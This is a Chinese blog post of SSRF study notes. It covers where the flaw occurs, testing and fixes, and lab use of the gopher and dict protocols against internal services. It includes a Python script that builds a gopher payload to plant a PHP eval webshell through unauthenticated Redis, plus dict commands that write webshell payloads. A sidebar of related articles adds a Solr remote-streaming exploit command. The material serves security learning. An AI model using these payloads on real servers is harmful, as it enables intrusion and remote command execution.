SSRF漏洞学习

最新推荐文章于 2024-01-31 00:42:39 发布
最新推荐文章于 2024-01-31 00:42:39 发布
阅读量360 收藏 1
点赞数 1
分类专栏: 常见漏洞 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qingzhantianxia/article/details/113282598
版权

SSRF漏洞学习

ssrf描述

SSRF(Server-Side Request Forgery)服务器端请求伪造是由于相关链接可以由攻击控制导致服务发起相关请求而产生的漏洞,可以达到对用户访问不到的内网系统进行探测、访问的目的

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。

ssrf常见的出现位置

  1. 社交网站的分享内容,以及嵌入超链接的位置都有机会;
  2. 转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览;
  3. 在线翻译,因为会翻译输入的网址网页的内容导致问题
  4. 图片下载/加载 通过url进行下载或者加载
  5. 文件收藏 存现问题的愿意类似于社交网站分享内容
  6. 未公开的api实现以及其他调用URL的功能,通过解析js或者通过搜索引擎的语法配合关键字进行检索,share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain…
  7. 相关服务的远程升级功能,若是该地址链接可控,则可以进行篡改
  8. 编码处理,属性信息处理、文件转换等功能,例如ffpmg,ImageMagick,docx,pdf,xml处理器等,最为明显的为XXE漏洞中可以进行ssrf利用
  9. 从网站采集功能,数据库内置函数、邮件接收系统

ssrf主要使用以下协议

  1. http/https
  2. ftp
  3. file
  4. dict
  5. Gopher

测试方法

  • 通过返回内容明显的得到确认;
  • 通过dnslog等平台确认是否是由服务发起访问
    注意:对ssrf进行验证时,可以通过爆破子域名时得到的内网ip进行验证。

漏洞修复方式

  • 在某些场景下可以采用白名单的方式对某些服务器资源进行访问,白名单包括服务器地址、端口、甚至目录等。(较为彻底的修复该问题)
  • 禁用不必要的协议可以从一定程度上减轻该漏洞的危害(减轻危害)。
  • 统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。(减弱危害)
  • 对返回内容进行判断并限制

ssrf 漏洞实例实验

在实验中常见协议的作用

http/https

gopher协议

gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。

基本格式

gopher://ip:port/_{TCP/IP数据流}

基本实验参考链接:

https://www.cnblogs.com/Konmu/p/12984891.html

  • get请求 curl gopher://192.168.220.128:80/_GET%20/post.php?name=aaaa%20HTTP/1.1%0d%0AHost:192.168.220.128%0d%0A

  • 在这里插入图片描述

  • post请求 curl gopher://192.168.220.128:80/_POST%20/post.php%20HTTP/1.1%0d%0AHost:192.168.220.128%0d%0AContent-Type:application/x-www-form-urlencoded%0d%0AContent-Length:12%0d%0A%0d%0Aname=purplet%0d%0A

  • 在这里插入图片描述

  • 在实际实验中get请求时可以不对“:”、“?”、“/”等内容进行URL转码,也是可以成功的
  • post请求在数据报体中提交数据时,需要传递Content-Type,Content-Length,host,post的参数等四个内容
  • 在结尾以及换行处使用%0d%0a代替即可
dict协议

词典网络协议,在RFC 2009中进行描述。它的目标是超越Webster protocol,并允许客户端在使用过程中访问更多字典。

基本格式

dict://ip:port/命令:参数
例如获取redis的key值curl dict://192.168.0.67:6379/get:name

注意问题

  1. dict基本格式中的命令你个部分可以连续使用多个:,例如config:set:dir:/var/www/html,自动加入回车换行较未简单

攻击redis以及FastCGI

gopher 攻击redis未授权

gopher 攻击redis POC构造方法

主要操作为使用转包工具抓取redis-cli与服务端的通信数据报,然后将数据保存为hex然后附在gopher请求的内容处,每个字节前面要加上%。

1、根据实际情况选择监听的选择项,我实验是在本地所以选择回环端口
在这里插入图片描述

2、使用redis-cli 链接后,发送要操作的命令,然后用wireshark抓取数据包,选择hex-dunp保存出来,在16进制前面加上%,附在gopher协议请求中即可
在这里插入图片描述
在这里插入图片描述

gopher协议攻击redis协议时程度python2 POC构造脚本

#/usr/bin/python

import rllib

protocol="gopher://"

ip="173.235.203.11"

port="6379"

shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"

filename="shell.php"

path="/var/www/html"

passwd=""

cmd=["flushall",     

   "set 1 {}".format(shell.replace(" ","${IFS}")),     

   "config set dir {}".format(path),     

   "config set dbfilename {}".format(filename),     

   "save"     

   ]

if passwd:    

   cmd.insert(0,"AUTH {}".format(passwd))

payload=protocol+ip+":"+port+"/_"

def redis_format(arr):    

   CRLF="\r\n"    

   redis_arr = arr.split(" ")    

   cmd=""    

   cmd+="*"+str(len(redis_arr))    

   for x in redis_arr:        

      cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")    

   cmd+=CRLF    

   return cmd


if __name__=="__main__":    

   for x in cmd:        

      payload += urllib.quote(redis_format(x))    

   print(payload)
dict攻击redis未授权

POC构造

由于dict协议的特性,只能一句一句的写入命令来达到想要的目的,另外攻击redis时特殊符号会导致截断以及报错问题的发生,例如“?”、“’”等,若是想要绕过,可以进行16进制编码然后以\x+编码的方式的表示,亲测可用

注意

在直接使用curl写入时如dict://192.168.220.129:6379/set:ddd:"\x3C\x3fphp\x20phpinfo\x28\x29\x3b\x3f\x3e",redis并不会对编码进行解码,而在http请求中构造的dict请求协议可以,例如http://127.0.0.1/pikachu-master/vul/ssrf/ssrf_curl.php?url=dict://192.168.220.129:6379/set:ddd:"\x3C\x3fphp\x20phpinfo\x28\x29\x3b\x3f\x3e"

写入webshell 过程redis原命令如下,因为使用dict 写入webshell时<、>、?等符号会存在截断、报错等问题、所以需要进行编码。

  1. config set dir /var/www/html
  2. set xxx “\n\n\n<?php @eval($_POST['c']);?>\n\n\n”
  3. config set dbfilename webshell.php
  4. save
攻击FastCGI

待补充

参考链接

https://xz.aliyun.com/t/2115?accounttraceid=41e23ce1d9dd4b89a0e90fbbba6966a8pqum
https://www.jianshu.com/p/d1d1c40f6d4c
https://www.cnblogs.com/blacksunny/p/9223300.html
https://yinwc.github.io/2018/11/16/SSRF/
https://www.freebuf.com/vuls/213714.html
https://blog.chaitin.cn/gopher-attack-surfaces/
https://www.cnblogs.com/Konmu/p/12984891.html
https://mp.weixin.qq.com/s/umNUpdz6Mqvhlgqu4-9NCQ
https://zhuanlan.zhihu.com/p/115222529
https://www.cnblogs.com/zh1z3ven/p/14214208.html

烟雨醉沉浮
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
chatgpt pictureproxy.php SSRF漏洞(含批量验证poc)
weixin_43567873的博客
04-01 133
chatgpt pictureproxy.php SSRF漏洞(含批量验证poc)
【技术分享】SSRF漏洞学习 .pdf
09-05
【技术分享】SSRF漏洞学习 安全测试 大数据 信息安全研究 安全对抗 企业安全
CSRF及SSRF详解
剁椒鱼头没剁椒的博客
11-29 4616
  CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。   CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。  1)首先用户登录网站,并且生产本地的cookie。   2)用户在未登陆出网站的时候,访问攻击者构建的恶意网站。   当然若你关闭网站去访问恶意网站就会避免该问题,但不是绝对的,相信在日常使用中都会存在浏览器同时打开多个页面,很少说有人去访问一个网站的时候把另外的网
使用docker搭建ssrf漏洞环境
m0_71326960的博客
03-20 403
开启Ubuntu虚拟机,打开终端,切换root用户su root。进入vulhub-master/weblogic/ssrf目录。下载完成后使用docker images命令查看本地镜像。地址:7001/uddiexplorer。在使用docker ps查看容器进程。
Web安全之SSRF漏洞
qq_42751192的博客
09-19 338
SSRF (Server-Side Request Forgery) 即服务器端请求伪造,是一种由攻击者构造,由服务端发起请求的一个网络攻击,一般用来在外网探测或攻击内网服务,其影响效果根据服务器用的函数不同,从而造成不同的影响。SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定 URL 地址获取网页文本内容,加载指定地址的图片,下载等等。
漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC)
qq_41703976的博客
03-19 1585
漏洞详情 Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复 通过Solr提供的API可以开启远程开启文件流读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xx.xx.xx.xx:8984/solr/corename/config -H 'Content-type:application/json' 再传入文件
SSRF打穿内网
..
02-18 5947
前言 这里通过国光的靶场来对SSRF进行练习,看一下靶场的设计图 理清楚一下攻击流程,在172.72.23.21这个服务器的80端口存在SSRF漏洞,并且80端口映射到了公网的8080,攻击者可以在8080端口借助SSRF漏洞发起对172目标内网的探测和攻击。 xxx.xx.xx:8080 -判断存在SSRF 能够对外网发起请求的地方,就有可能存在SSRF。看一下这个站点的正常功能,是一个站点快照获取。 先试试访问一下外网,用www.baidu.com来试一下。 发现访问成.
ssrf漏洞 java反_SSRF漏洞分析与利用
weixin_35431719的博客
02-22 1306
前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的0x01 漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURL...
手把手带你用 SSRF 打穿内网
weixin_50464560的博客
05-13 2641
靶场拓扑设计首先来看下本次靶场的设计拓扑图: 先理清一下攻击流程,172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网的 8080,此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。 本场景基本上覆盖了 SSRF 常见的攻击场景,实际上 SSRF 还可以攻击 FTP、Zabbix、Memcached 等应用,由于时间和精力有限,先挖个坑,以后有机会的话再补充完善这套 SSRF 攻击场景的。 x.x.x.x
SSRF和XXE漏洞攻防
weixin_59616219的博客
12-20 450
SSRF和XXE漏洞攻防
乌云峰会猪猪侠ppt-关于SSRF
03-26
该资源是猪猪侠在2016年乌云峰会上发表演讲的PPT(已被转成PDF),内容是关于SSRF漏洞,我之前找这个找了很久,在这里分享出来,供大家参考学习,共同进步。
国光师傅的SSRF靶场docker环境.zip
01-14
总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好...
SecExample:JAVA 漏洞靶场 (Vulnerability Environment For Java)
07-24
star:[CSRF漏洞]:glowing_star::glowing_star:[SSRF漏洞]:glowing_star::glowing_star:[CORS漏洞]:glowing_star::glowing_star::glowing_star::glowing_star:[反序列化漏洞-Fastjson反序列化]:glowing_star::glowing...
SSRF笔记整理
最新发布
I_WORM的博客
01-31 631
服务器请求伪造 原理简述 A通过指使B对C进行攻击 A无法直接访问C;B可以直接访问C;B又很听A的话 漏洞成因 服务器可以获取另一台服务器应用的数据;并且对访问的地址没有过滤和限制 简单来说就是一台服务器拥有访问其他任意IP资源的权利 判断点 一个网站通过url就可以访问或者下载其他网站的资源 url获取网页文本;加载url获取图片下载;识别url获取资源等 分享、图片加载、翻译网站、 PHP中可能存在ssrf漏洞
MinIO未授权SSRF漏洞(CVE-2021-21287)
thelostworld
02-05 1万+
MinIO未授权SSRF漏洞(CVE-2021-21287) 一、漏洞简介 ​ 由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞 攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令 该漏洞无需用户验证即可远程利用 二、影响版本 MinIO < RELEASE.2021-01-30T00-20-58Z 三、环境准备&漏洞复现 Docker 安装minio: d...
SSRF漏洞详解 一文了解SSRF漏洞
闵行小鱼塘
11-09 5135
本篇总结归纳SSRF漏洞
SSRF 漏洞的寻找
WHACKW的专栏
01-04 5405
SSRF 漏洞的寻找 一、从WEB功能上寻找 我们从上面的概述可以看出,SSRF是由于服务端获取其他服务器的相关信息的功能中形成的,因此我们大可以列举几种在web 应用中常见的从服务端获取其他服务器信息的的功能。 1)分享:通过URL地址分享网页内容 早期分享应用中,为了更好的提供用户体验,WEB应用在分享功能中,通常会获取目标URL地址网页内容中的标签或者标签中content的文本内容作
SSRF漏洞分析与利用
3569
11-06 7637
http://www.91ri.org/17111.html 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 漏洞产生 以curl为例,漏洞代码为ssrf.php Default 1234567
路径穿越(Path Traversal)详解
热门推荐
12-06 1万+
本文主要是对路径穿越漏洞进行学习总结,本身这个漏洞也并不常见,主要是多产生于php的程序。这种类型的攻击强制访问文件、目录、 以及位于 Web 文档根目录之外的命令 或 CGI 根目录。常用来其他读取、写入类漏洞结合。我个人给这种漏洞形成的原因可以分为两类 错误配置由于带有中间代理转发性质的功能配置错误程序本身代码存在问题这一点十分好理解,就是代码写的有问题,逻辑简单,没有验证。第一类:文件类参数请求参数似乎包含文件或目录名称的,例如include=main.inc或template=/en/sidebar
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
SSRF (Server-Side Request Forgery) 漏洞是一种常见的 Web 安全漏洞,攻击者通过构造恶意的请求,从而使服务器发起非预期的请求,可能导致敏感信息泄露、服务器受到攻击等后果。 在内网渗透中,SSRF 漏洞可以用来发起内网扫描、访问内部系统等攻击。通常情况下,攻击者会构造恶意请求,将目标网站的请求地址改为内部 IP 或者域名,从而让服务器发起请求,从而得到内部系统的信息。 下面是一个简单的 SSRF 漏洞利用的步骤: 1. 扫描目标网站:使用端口扫描工具扫描目标网站开放的端口,确定是否存在可利用的服务。 2. 构造恶意请求:构造一个包含内网地址的恶意请求,将请求地址改为内网地址。 3. 触发漏洞:将恶意请求发送给目标网站,从而触发 SSRF 漏洞。 4. 收集信息:利用 SSRF 漏洞,收集内部系统的信息,如端口、服务、操作系统等。 5. 利用漏洞:根据收集到的信息,选择合适的漏洞利用方式,从而取得系统权限。 在实际攻击中,攻击者还可能会采用其他方式来利用 SSRF 漏洞,如访问内部 Web 应用、获取敏感文件等。因此,网站开发人员需要注意防范 SSRF 漏洞,如过滤用户输入、限制请求地址等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值